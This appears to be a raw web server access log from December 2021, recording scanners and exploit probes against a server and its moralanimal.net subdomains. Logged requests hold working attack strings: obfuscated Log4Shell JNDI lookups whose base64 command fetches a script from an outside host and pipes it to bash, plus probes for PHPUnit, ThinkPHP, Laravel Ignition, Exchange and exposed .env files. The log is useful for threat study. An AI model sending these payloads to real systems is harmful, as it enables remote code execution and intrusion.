[17/Dec/2021:22:06:44 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [17/Dec/2021:22:24:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [17/Dec/2021:22:24:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [17/Dec/2021:22:24:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [17/Dec/2021:22:24:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [17/Dec/2021:22:24:13 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 162.142.125.194] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [17/Dec/2021:22:32:11 +0000] 400 - - http localhost "-" [Client 147.182.146.131] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:32:43 +0000] 444 - GET https zmail.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [17/Dec/2021:22:38:42 +0000] 400 - - http localhost "-" [Client 137.184.96.225] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:44:50 +0000] 400 - - http localhost "-" [Client 138.197.219.172] [Length 154] [Gzip -] "-" "-" [17/Dec/2021:22:51:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [17/Dec/2021:22:52:24 +0000] 400 - - http localhost "-" [Client 147.182.146.99] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:00:33:39 +0000] 444 - GET https mta1.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:01:10:18 +0000] 444 - GET https owa.moralanimal.net "/" [Client 34.86.35.19] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Dec/2021:01:10:57 +0000] 444 - GET https mailer.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:01:34:28 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.77.162.9] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Dec/2021:01:35:18 +0000] 444 - GET https newmail.moralanimal.net "/" [Client 34.86.35.15] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Dec/2021:01:37:00 +0000] 444 - GET https vmail.moralanimal.net "/" [Client 34.96.130.0] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Dec/2021:01:43:48 +0000] 444 - GET https ms1.moralanimal.net "/" [Client 34.86.35.0] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Dec/2021:01:46:34 +0000] 444 - GET https srv.moralanimal.net "/" [Client 34.77.162.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Dec/2021:02:38:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.173.72.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3049.82 Safari/537.32" "-" [18/Dec/2021:02:38:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.173.72.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3049.82 Safari/537.32" "-" [18/Dec/2021:02:58:05 +0000] 444 - GET https tw.moralanimal.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:03:39:40 +0000] 444 - GET https mx02.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:03:48:11 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.195.245] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:05:31:57 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Dec/2021:05:45:48 +0000] 400 - HEAD http localhost "/" [Client 178.128.45.6] [Length 0] [Gzip -] "-" "-" [18/Dec/2021:05:45:48 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 178.128.45.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:49 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 178.128.45.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:50 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 178.128.45.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:51 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 178.128.45.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:51 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 178.128.45.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:51 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 178.128.45.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:53 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 178.128.45.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:53 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 178.128.45.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:53 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 178.128.45.6] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [18/Dec/2021:05:45:54 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 178.128.45.6] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [18/Dec/2021:05:45:54 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 178.128.45.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:54 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 178.128.45.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:55 +0000] 400 - GET http 64.22.31.253 "/" [Client 178.128.45.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:05:45:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.128.45.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Dec/2021:06:14:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [18/Dec/2021:07:13:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:07:14:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.214.219] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:07:15:45 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:07:35:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Dec/2021:07:55:39 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.95] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:08:05:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.32] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:08:17:09 +0000] 444 - GET https 64.22.31.253 "/admin/public/index.html" [Client 89.248.160.193] [Length 0] [Gzip -] "libwww-perl/6.54" "-" [18/Dec/2021:09:08:42 +0000] 444 - GET https owa.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:09:10:57 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:10:24:35 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:10:25:19 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:10:26:42 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [18/Dec/2021:11:04:36 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:11:09:12 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:11:33:06 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:11:51:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Dec/2021:12:11:52 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Dec/2021:12:41:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.96] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Dec/2021:13:08:36 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Dec/2021:13:12:46 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:13:38:44 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Dec/2021:14:22:13 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.109.163] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [18/Dec/2021:14:36:03 +0000] 444 - GET https srv.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:14:54:53 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:15:09:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:16:31:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Dec/2021:16:55:38 +0000] 444 - GET https 64.22.31.253 "/?q=%chroococcaceae%&va=b&t=hc&ia=web" [Client 34.94.165.1] [Length 0] [Gzip -] "-" "-" [18/Dec/2021:17:10:08 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://31.131.16.127:1389/Exploit}" [Client 60.31.180.149] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [18/Dec/2021:17:10:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 60.31.180.149] [Length 0] [Gzip -] "${jndi:ldap://31.131.16.127:1389/Exploit}" "-" [18/Dec/2021:17:10:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 60.31.180.149] [Length 0] [Gzip -] "curl/7.58.0" "-" [18/Dec/2021:17:16:23 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:17:35:24 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [18/Dec/2021:18:31:48 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [18/Dec/2021:18:42:41 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 51.68.111.184] [Length 0] [Gzip -] "Python/3.7 aiohttp/3.7.4.post0" "-" [18/Dec/2021:18:42:41 +0000] 444 - POST https 64.22.31.253 "/" [Client 51.68.111.184] [Length 0] [Gzip -] "Python/3.7 aiohttp/3.7.4.post0" "-" [18/Dec/2021:19:11:40 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Dec/2021:20:02:28 +0000] 444 - GET https mx0.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Dec/2021:20:32:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [18/Dec/2021:20:50:05 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:20:50:05 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [18/Dec/2021:22:20:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Dec/2021:00:49:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 85.93.218.204] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [19/Dec/2021:00:49:10 +0000] 444 - OPTIONS https localhost "/" [Client 104.244.75.88] [Length 0] [Gzip -] "-" "-" [19/Dec/2021:00:49:11 +0000] 400 - - https localhost "-" [Client 104.244.75.88] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:00:49:12 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 104.244.75.88] [Length 0] [Gzip -] "-" "-" [19/Dec/2021:00:49:18 +0000] 400 - - https localhost "-" [Client 104.244.75.88] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:01:31:53 +0000] 444 - GET https ns2.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:02:59:15 +0000] 400 - - http localhost "-" [Client 194.110.13.91] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:02:59:15 +0000] 400 - GET http i.pixita.com "/robots.txt" [Client 45.133.172.21] [Length 252] [Gzip -] "-" "-" [19/Dec/2021:02:59:15 +0000] 400 - - http localhost "-" [Client 5.253.204.122] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:02:59:15 +0000] 400 - GET http i.pixita.com "/robots.txt" [Client 178.162.222.44] [Length 252] [Gzip -] "-" "-" [19/Dec/2021:02:59:15 +0000] 400 - - http localhost "-" [Client 193.56.252.221] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:02:59:16 +0000] 400 - - http localhost "-" [Client 46.183.218.152] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:04:15:45 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [19/Dec/2021:04:15:45 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [19/Dec/2021:04:20:16 +0000] 444 - GET https antispam.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:04:41:01 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:04:44:35 +0000] 444 - GET https mailrelay.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:04:51:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Dec/2021:04:59:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Dec/2021:05:51:58 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.210.239] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:06:17:14 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:06:29:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.69] [Length 0] [Gzip -] "-" "-" [19/Dec/2021:06:37:02 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:06:46:38 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 185.162.74.82] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [19/Dec/2021:07:19:35 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 45.67.14.27] [Length 0] [Gzip -] "curl/7.3.2" "-" [19/Dec/2021:07:58:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.196.224] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:08:04:08 +0000] 400 - - http localhost "-" [Client 94.102.51.31] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:08:07:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.194.105] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:08:41:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.227.130.54] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [19/Dec/2021:08:52:34 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:09:13:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Dec/2021:09:20:53 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:09:22:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.10] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:09:22:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.194.12] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:09:23:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.204.149] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:10:07:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:10:53:51 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:11:02:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.41] [Length 0] [Gzip -] "-" "-" [19/Dec/2021:11:02:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.41] [Length 252] [Gzip -] "-" "-" [19/Dec/2021:11:02:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 